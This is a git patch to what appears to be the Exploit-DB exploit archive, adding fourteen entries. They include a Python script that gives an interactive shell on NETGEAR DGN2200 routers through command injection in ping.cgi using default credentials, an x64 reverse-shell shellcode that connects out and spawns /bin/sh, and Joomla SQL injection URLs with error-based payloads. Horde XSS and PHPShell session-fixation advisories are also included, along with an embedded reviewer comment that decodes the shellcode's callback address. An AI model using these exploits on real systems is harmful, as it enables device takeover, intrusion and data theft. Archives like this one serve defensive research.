From ae0dd9fa7cf71a5ee27c38be5a9c2b825e17b1b8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 20 Feb 2017 05:01:17 +0000
Subject: [PATCH] DB: 2017-02-20

14 new exploits

Linux - Reverse Shell Shellcode (66 bytes)

Joomla! Component com_Joomlaoc - 'id' SQL Injection
Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection

Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection

Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload

Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting
Horde 3.3.5 - Cross-Site Scripting

Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection
Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection
Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Joomla! Component OS Property 3.0.8 - SQL Injection
Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection
Joomla! Component OS Services Booking 2.5.1 - SQL Injection
Joomla! Component Room Management 1.0 - SQL Injection
Joomla! Component Bazaar Platform 3.0 - SQL Injection
Joomla! Component Google Map Store Locator 4.4 - SQL Injection
Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection
NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Sawmill Enterprise 8.7.9 - Authentication Bypass
PHPShell 2.4 - Session Fixation
---
 files.csv                            |  22 ++++-
 platforms/hardware/webapps/41394.py  |  58 +++++++++++
 platforms/linux/shellcode/41398.nasm |  71 ++++++++++++++
 platforms/php/webapps/33406.txt      |   2 +-
 platforms/php/webapps/41383.txt      |  17 ++++
 platforms/php/webapps/41384.txt      |  18 ++++
 platforms/php/webapps/41385.txt      |  17 ++++
 platforms/php/webapps/41386.txt      |  17 ++++
 platforms/php/webapps/41387.txt      |  17 ++++
 platforms/php/webapps/41388.txt      |  21 ++++
 platforms/php/webapps/41389.txt      |  23 +++++
 platforms/php/webapps/41390.txt      |  23 +++++
 platforms/php/webapps/41391.txt      |  19 ++++
 platforms/php/webapps/41393.txt      |  20 ++++
 platforms/php/webapps/41396.txt      | 136 ++++++++++++++++++++++++++
 platforms/windows/webapps/41395.txt  | 138 +++++++++++++++++++++++++++
 16 files changed, 614 insertions(+), 5 deletions(-)
 create mode 100755 platforms/hardware/webapps/41394.py
 create mode 100755 platforms/linux/shellcode/41398.nasm
 create mode 100755 platforms/php/webapps/41383.txt
 create mode 100755 platforms/php/webapps/41384.txt
 create mode 100755 platforms/php/webapps/41385.txt
 create mode 100755 platforms/php/webapps/41386.txt
 create mode 100755 platforms/php/webapps/41387.txt
 create mode 100755 platforms/php/webapps/41388.txt
 create mode 100755 platforms/php/webapps/41389.txt
 create mode 100755 platforms/php/webapps/41390.txt
 create mode 100755 platforms/php/webapps/41391.txt
 create mode 100755 platforms/php/webapps/41393.txt
 create mode 100755 platforms/php/webapps/41396.txt
 create mode 100755 platforms/windows/webapps/41395.txt

diff --git a/files.csv b/files.csv
index 8975101b6..053b676f2 100644
--- a/files.csv
+++ b/files.csv
@@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 +41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 
@@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 -9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 +9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 
@@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port 12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 
@@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port 19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0 19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0 -19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0 +19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 
@@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0 -33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 
@@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port 41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41393,platforms/php/webapps/41393.txt,"Joomla! 
Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0 +41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0 +41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0 diff --git a/platforms/hardware/webapps/41394.py b/platforms/hardware/webapps/41394.py new file mode 100755 index 000000000..0b9508ec0 --- /dev/null +++ b/platforms/hardware/webapps/41394.py 
@@ -0,0 +1,58 @@ +#!/usr/bin/python +#Provides access to default user account, privileges can be easily elevated by using either: +# - a kernel exploit (ex. memodipper was tested and it worked) +# - by executing /bin/bd (suid backdoor present on SOME but not all versions) +# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln) + +#Pozdrawiam: Kornela, Komara i Sknerusa + +import sys +import requests + +#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions +#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to + +login = 'admin' +password = 'password' + + +def main(): + if len(sys.argv) < 2 or len(sys.argv) == 3: + print "./netgearpwn.py " + return + spawnShell() + +def execute(cmd): + r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"}) + result = parseOutput(r.text) + return result + +def spawnShell(): + r = execute("echo pwn3d") + + if any("pwn3d" in s for s in r) == False: + print "Something went wrong, is the system vulnerable? Are the credentials correct?" + return + + while True: + cmd = raw_input("$ ") + r = execute(cmd) + for l in r: + print l.encode("utf-8") + +def parseOutput(output): + yet = False + a = False + result = [] + for line in output.splitlines(): + if line.startswith(""): + break + result.append(line) + return result + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/linux/shellcode/41398.nasm new file mode 100755 index 000000000..73400add3 --- /dev/null +++ b/platforms/linux/shellcode/41398.nasm 
@@ -0,0 +1,71 @@ +;The MIT License (MIT) + +;Copyright (c) 2017 Robert L. Taylor + +;Permission is hereby granted, free of charge, to any person obtaining a +;copy of this software and associated documentation files (the “Software”), +;to deal in the Software without restriction, including without limitation +;the rights to use, copy, modify, merge, publish, distribute, sublicense, +;and/or sell copies of the Software, and to permit persons to whom the +;Software is furnished to do so, subject to the following conditions: + +;The above copyright notice and this permission notice shall be included +;in all copies or substantial portions of the Software. + +;The Software is provided “as is”, without warranty of any kind, express or +;implied, including but not limited to the warranties of merchantability, +;fitness for a particular purpose and noninfringement. In no event shall the +;authors or copyright holders be liable for any claim, damages or other +;liability, whether in an action of contract, tort or otherwise, arising +;from, out of or in connection with the software or the use or other +;dealings in the Software. +; +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.ca/2017/02/assignment-2b.html + +global _start +section .text +_start: +; Socket + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq + syscall +; Connect + xchg edi, eax + push rdx + mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002 + not rbx + push rbx + mov al, 42 + push rsp + pop rsi + mov dl, 16 + syscall +; Dup 2 + push 3 + pop rsi +dup2loop: + mov al, 33 + dec esi + syscall + loopnz dup2loop +; Execve + ; rax and rsi are zero from the result of the last dup2 syscall and loop + push rax ; zero terminator for the following string that we are pushing + + mov rbx, '/bin//sh' + push rbx + + ; store /bin//sh address in RDI + push rsp + pop rdi + + cdq ; zero rdx + + mov al, 59 + syscall 
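Review bot: the "; not encoded 0x0100007f5c110002" comment in the 41398.nasm hunk gives only the raw constant; it should say what the 16 bytes are, namely a sockaddr_in of AF_INET (0x0002), port 4444 (0x115c) and address 127.0.0.1 (0x7f000001), so a reader can verify the callback target without decoding it by hand. The dup2loop also deserves a comment that it depends on rcx being non-zero for loopnz, which holds only because syscall leaves the return rip in rcx; and since the code uses rax/rdi/rsi and the 64-bit syscall numbers (41, 42, 33, 59), the files.csv entry should carry a platform tag that records the 64-bit target, in the way the neighbouring @@ -15898 entries use lin_x86 and win_x86 for their 32-bit shellcode, rather than the bare "linux".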
diff --git a/platforms/php/webapps/33406.txt b/platforms/php/webapps/33406.txt index 943a0c4b0..45770c70e 100755 --- a/platforms/php/webapps/33406.txt +++ b/platforms/php/webapps/33406.txt @@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6. Note that additional products that use the Horde framework may also be vulnerable. -http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid> \ No newline at end of file +http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde= \ No newline at end of file diff --git a/platforms/php/webapps/41383.txt b/platforms/php/webapps/41383.txt new file mode 100755 index 000000000..3d8692e91 --- /dev/null +++ b/platforms/php/webapps/41383.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection +# Google Dork: inurl:index.php?option=com_joomloc +# Date: 18.02.2017 +# Vendor Homepage: http://www.joomloc.fr.nf/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/ +# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/ +# Version: 4.1.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41384.txt b/platforms/php/webapps/41384.txt new file mode 100755 index 000000000..ac7836ae5 --- /dev/null +++ b/platforms/php/webapps/41384.txt 
@@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_joomloc +# Date: 18.02.2017 +# Vendor Homepage: http://www.joomloc.fr.nf/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/ +# Demo: http://www.joomloc.fr.nf/joomloclite/ +# Version: 1.3.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL] +# # # # # + diff --git a/platforms/php/webapps/41385.txt b/platforms/php/webapps/41385.txt new file mode 100755 index 000000000..ddaa84988 --- /dev/null +++ b/platforms/php/webapps/41385.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_awdwall +# Date: 18.02.2017 +# Vendor Homepage: http://dashbite.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/ +# Demo: http://demo-dashbite.com/ +# Version: 4.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41386.txt b/platforms/php/webapps/41386.txt new file mode 100755 index 000000000..986774e2b --- /dev/null +++ b/platforms/php/webapps/41386.txt 
@@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection +# Google Dork: inurl:index.php?option=com_osproperty +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html +# Demo: http://osproperty.ext4joomla.com/ +# Version: 3.0.8 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41387.txt b/platforms/php/webapps/41387.txt new file mode 100755 index 000000000..1a8effa74 --- /dev/null +++ b/platforms/php/webapps/41387.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_eshop +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html +# Demo: http://joomdonationdemo.com/eshop +# Version: 2.5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41388.txt b/platforms/php/webapps/41388.txt new file mode 100755 index 000000000..d88e19855 --- /dev/null +++ b/platforms/php/webapps/41388.txt 
@@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_osservicesbooking +# Date: 18.02.2017 +# Vendor Homepage: https://www.joomdonation.com/ +# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html +# Demo: http://osb.ext4joomla.com/ +# Version: 2.5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41389.txt b/platforms/php/webapps/41389.txt new file mode 100755 index 000000000..cf49a4622 --- /dev/null +++ b/platforms/php/webapps/41389.txt 
@@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_roommgmt +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/room-management/live-demo +# Demo: http://matamko.com/products/room-management/live-demo +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL] +# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL] +# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL] +# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41390.txt b/platforms/php/webapps/41390.txt new file mode 100755 index 000000000..661b754d2 --- /dev/null +++ b/platforms/php/webapps/41390.txt 
@@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_bazaar +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/bazaar/live-demo +# Demo: http://matamko.com/products/bazaar/live-demo +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL] +# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL] +# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL] +# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41391.txt b/platforms/php/webapps/41391.txt new file mode 100755 index 000000000..56f73a6fb --- /dev/null +++ b/platforms/php/webapps/41391.txt 
@@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection +# Google Dork: inurl:index.php?option=com_googlemaplocator +# Date: 18.02.2017 +# Vendor Homepage: http://matamko.com/ +# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo +# Demo: http://gtlocator4.demo.matamko.com/ +# Version: 4.4 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL] +# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41393.txt b/platforms/php/webapps/41393.txt new file mode 100755 index 000000000..ceeb2d29a --- /dev/null +++ b/platforms/php/webapps/41393.txt 
@@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_mostwantedrealestate +# Date: 18.02.2017 +# Vendor Homepage: http://mostwantedrealestatesites.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/ +# Demo: http://demo.mostwantedrealestatesites.com/ +# Version: 1.1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL] +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL] +# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL] +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41396.txt b/platforms/php/webapps/41396.txt new file mode 100755 index 000000000..6aaffceae --- /dev/null +++ b/platforms/php/webapps/41396.txt 
@@ -0,0 +1,136 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================================== +sourceforge.net/projects/phpshell/ +phpshell.sourceforge.net/ + + + +Product: +============== +PHPShell v2.4 + + + +Vulnerability Type: +=================== +Session Fixation + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +PHPShell does not regenerate the Session ID upon authentication, this can +potentially allow remote attackers to access parts of the application +using only a valid PHPSESSID if PHP.INI setting for +session.use_only_cookies=0. + +Since an existing XSS vulnerability exists in PHPShell " +http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt" +the risk is +increased if an authenticated user clicks an attacker supplied link and the +attacker finds way to access or set the victims Cookie. + +In 'phpshell.php' line 153 we see call to PHP function session_start(); + +After user authentication no call to "session_regenerate_id()" is made +leaving the authenticated session id same as pre-auth session id. +However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to +exploit it would require that PHP.INI is set to session.use_only_cookies=0 +on the victims system. + +When accessing the application using the session fixation flaw and +attempting to run system command the application luckily redirects to login +form. +However, if a victim is actively changing directorys, reading files etc... +attackers may still be able to read current directory and files open +in the victims PHPShell console window. 
